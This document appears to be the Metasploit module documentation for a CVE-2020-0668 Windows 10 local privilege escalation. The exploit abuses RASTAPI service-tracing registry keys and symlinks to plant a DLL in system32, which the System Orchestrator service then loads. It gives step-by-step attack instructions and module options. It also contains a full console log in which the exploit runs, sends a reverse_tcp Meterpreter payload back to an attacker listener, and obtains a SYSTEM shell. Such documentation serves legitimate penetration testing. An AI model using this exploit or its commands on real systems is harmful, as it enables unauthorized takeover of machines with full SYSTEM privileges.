## Vulnerable Application

Windows 10 x64 build versions 17134-18363

On builds prior to 17134, the file copy takes place, but it copies the
logfile rather than the payload.  it is possible that tweaking the
MaxSize registry value will affect this, but I found not value that
worked.

### Introduction

This module makes changes to the filesystem that cannot be removed
without Administrative access and a reboot happens.  Specifically, the
payload C:\windows\system32\WindowsCoreDeviceInfo.dll will be held open
by the RasMan Service until a reboot.  That also rpevents removal of the
directories (if any) that were created. I was not able to stop the
service without a reboot to allow file removal.

This module crashes occasionally when writing to
HKLM\SOFTWARE\Microsoft\Tracing\RASTAPI.  If that happens, you cannot
re-run the module, as there will be a name collision for the symlinks
required.  It might be nice to add a way to clean that up, as it
requires the use of the WindowsAPI through railgun.

The Remote Access Service runs as system and creates a log of its
actions called RASTAPI.LOG. Once the RASTAPI.LOG reaches a defined size,
the Remote Access Service copies RASTAPI.LOG to RASTAPI.OLD in the same
directory.
The issue is twofold. First, the behavior of the Remote Access Service
Tool API is defined by three registry keys:

* HKLM\SOFTWARE\Microsoft\Tracing\RASTAPI\EnableFileTracing
* HKLM\SOFTWARE\Microsoft\Tracing\RASTAPI\FileDirectory
* HKLM\SOFTWARE\Microsoft\Tracing\RASTAPI\new_size

These three registry keys allow a user to turn on the RASTAPI and
configure the size and location of the log file. These registry keys are
writable by a regular user.

The second issue is that the RAST service performs only a trivial check
on the filesystem location of the RASTAPI.OLD destination. If an
attacker creates a filesystem link between the old log destination
(i.e. C:\users\user\temp\RASTAPI.OLD) and a trusted location
(C:\windows\system32\badfile.dll), RASDIALER will copy the old log file
to the linked location as the SYSTEM user. In this case, we write to
C:\windows\system32\windowscoredeviceinfo.dll and then take advantage of
a hijacking vulnerability in the System Orchestrator service.

The attack looks something like:

1. Gain lower-privileged access to a vulnerable target.
1. Create a dummy directory to hold files.
1. Mount the dummy directory to \RPC Control
1. Upload a dll payload
1. Create a link between \RPC Control\RASTAPI.LOG and the uploaded
   payload
1. Create a link between \RPC Control\RASTAPI.OLD and the destination
   location the attacker would like to write (in this module,
   C:\Windows\system32\WindowsCreDeviceInfo.dll)
1. Write the registry keys to turn on FileTracing, set the file
   directory to the dummy directory, and set the max file size to one
   byte less than the size of the payload,
1. Upload a configuration file for the rasdialer
1. Launch the rasdialer. When RAST service kicks off, it tries to write
   a log file to the directory specified in the registry, but it finds
   one already exists, and it is already full, so RAST service then
   copies the file to the “old” location that’s linked to the trusted
   location. The result is an arbitrary file write to a trusted
   location.
1. At this point, the overwrite is complete and we launch a trigger
   starting the System Orchestrator service which loads the overwritten
   dll.

## Verification Steps

  1. Start msfconsole
  2. Get a session with basic privileges
  3. Do: ```use exploit/windows/local/cve_2020_0668_service_tracing```
  4. Do: ```set payload windows/x64/<payload>```
  5. Do: ```set SESSION <sess_no>```
  6. Do: ```run```
  7. You should get a shell running as SYSTEM after several minutes.

## Options

  **EXPLOIT_DIR**
  Directory to use for file upload and linking; this should not already
  exist.  The directory cannot be deleted until after a reboot.

  **OVERWRITE_DLL**
  Overwrite WindowsCreDeviceInfo.dll if it exists (false by default).
  WindowsCoreDeviceInfo.dll is not present by default, but if it is
  present, it is likely loaded, so even with this set to true, the
  overwrite (and exploit) will fail.

  **PAYLOAD_UPLOAD_NAME**
  The filename to use for the payload binary (%RAND% by default).
  This is the name of the dll payload when uploaded to the remote host.

  **PHONEBOOK_UPLOAD_NAME**
  The name of the phonebook file to trigger RASDIAL (%RAND% by default).
  The rasdialer trigger requires a config file; this is the name of the
  xml file required to trigger the RAST service.

## Scenarios

### Tested on Windows10 x64 Release 1803

  ```
meterpreter > sysinfo
Computer        : DESKTOP-D1E425Q
OS              : Windows 10 (10.0 Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: DESKTOP-D1E425Q\msfuser
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: The environment is incorrect. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(multi/handler) > use exploit/windows/local/cve_2020_0668_service_tracing
msf5 exploit(windows/local/cve_2020_0668_service_tracing) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/local/cve_2020_0668_service_tracing) > set lhost 192.168.135.168
lhost => 192.168.135.168
msf5 exploit(windows/local/cve_2020_0668_service_tracing) > set verbose true
verbose => true
msf5 exploit(windows/local/cve_2020_0668_service_tracing) > set session 1
session => 1
msf5 exploit(windows/local/cve_2020_0668_service_tracing) > show options

Module options (exploit/windows/local/cve_2020_0668_service_tracing):

   Name                   Current Setting  Required  Description
   ----                   ---------------  --------  -----------
   EXPLOIT_DIR                             no        The directory to create for mounting (%TEMP%\%RAND% by default).
   OVERWRITE_DLL          false            yes       Overwrite WindowsCreDeviceInfo.dll if it exists (false by default).
   PAYLOAD_UPLOAD_NAME                     no        The filename to use for the payload binary (%RAND% by default).
   PHONEBOOK_UPLOAD_NAME                   no        The name of the phonebook file to trigger RASDIAL (%RAND% by default).
   SESSION                1                yes       The session to run this module on.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.135.168  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows x64


msf5 exploit(windows/local/cve_2020_0668_service_tracing) > run

[*] Started reverse TCP handler on 192.168.135.168:4444
[*] Build Number = 17134
[*] Attempting to PrivEsc on DESKTOP-D1E425Q via session ID: 1
[*] Payload DLL is 5120 bytes long
[*] Registry hash = [{:key_name=>"HKLM\\SOFTWARE\\Microsoft\\Tracing\\RASTAPI", :value_name=>"EnableFileTracing", :value_type=>"REG_DWORD", :value_value=>1, :delete_on_cleanup=>false}, {:key_name=>"HKLM\\SOFTWARE\\Microsoft\\Tracing\\RASTAPI", :value_name=>"FileDirectory", :value_type=>"REG_EXPAND_SZ", :value_value=>"C:\\Users\\msfuser\\AppData\\Local\\Temp\\jeYpOx", :delete_on_cleanup=>false}, {:key_name=>"HKLM\\SOFTWARE\\Microsoft\\Tracing\\RASTAPI", :value_name=>"MaxFileSize", :value_type=>"REG_DWORD", :value_value=>5119, :delete_on_cleanup=>false}]
[*] Making C:\Users\msfuser\AppData\Local\Temp\jeYpOx on DESKTOP-D1E425Q
[*] Creating C:\Users\msfuser\AppData\Local\Temp\jeYpOx
[*] Creating mountpoint
[+] Successfully opened C:\Users\msfuser\AppData\Local\Temp\jeYpOx
[*] Uploading payload to C:\Users\msfuser\AppData\Local\Temp\FICNArio.dll
[*] Payload md5 = b8341507939ea464f81f0245628e470f
[*] Creating Symlinks
[*] Creating symlink C:\Users\msfuser\AppData\Local\Temp\FICNArio.dll in \RPC Control\RASTAPI.LOG
[*] Collected Symlink Handle 704
[*] Creating symlink C:\Windows\system32\WindowsCoreDeviceInfo.dll in \RPC Control\RASTAPI.OLD
[*] Collected Symlink Handle 688
[*] Writing EnableFileTracing to HKLM\SOFTWARE\Microsoft\Tracing\RASTAPI
[*] Writing FileDirectory to HKLM\SOFTWARE\Microsoft\Tracing\RASTAPI
[*] Writing MaxFileSize to HKLM\SOFTWARE\Microsoft\Tracing\RASTAPI
[*] Uploading phonebook to DESKTOP-D1E425Q as C:\Users\msfuser\AppData\Local\Temp\TSvczqClZf.pbk from /home/tmoose/rapid7/metasploit-framework/data/exploits/cve-2020-0668/phonebook.txt
[*] Phonebook uploaded on DESKTOP-D1E425Q to C:\Users\msfuser\AppData\Local\Temp\TSvczqClZf.pbk
[*] Launching Rasdialer
[*] Running Rasdialer with phonebook C:\Users\msfuser\AppData\Local\Temp\TSvczqClZf.pbk
[*] Connecting to VPNTEST...

Remote Access error 807 - The network connection between your computer and the VPN server was interrupted.  This can be caused by a problem in the VPN transmission and is commonly the result of internet latency or simply that your VPN server has reached capacity.  Please try to reconnect to the VPN server.  If this problem persists, contact the VPN administrator and analyze quality of network connectivity.

For more help on this error:
	Type 'hh netcfg.chm'
	In help, click Troubleshooting, then Error Messages, then 807
[*] Checking on C:\Windows\system32\WindowsCoreDeviceInfo.dll
[*] Upload payload md5 = b8341507939ea464f81f0245628e470f
[*] Moved payload md5 = b8341507939ea464f81f0245628e470f
[*] Cleaning up before triggering dll load...
[*] Removing Registry keys
[*] Deleting EnableFileTracing from HKLM\SOFTWARE\Microsoft\Tracing\RASTAPI key
[*] Deleting FileDirectory from HKLM\SOFTWARE\Microsoft\Tracing\RASTAPI key
[*] Deleting MaxFileSize from HKLM\SOFTWARE\Microsoft\Tracing\RASTAPI key
[*] Removing Symlinks
[*] Closing symlink handle 704: The operation completed successfully.
[*] Closing symlink handle 688: The operation completed successfully.
[*] Removing Mountpoint
[*] Removing directories
[*] Triggering the Reflective DLL injection and running the LPE DLL...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[!] Manual cleanup after reboot required for C:\Windows\system32\WindowsCoreDeviceInfo.dll and C:\Users\msfuser\AppData\Local\Temp\jeYpOx
[*] Exploit complete.  It may take up to 10 minutes to get a session
[*] Sending stage (206403 bytes) to 192.168.132.125
[*] Meterpreter session 2 opened (192.168.135.168:4444 -> 192.168.132.125:49680) at 2020-04-29 09:39:54 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```
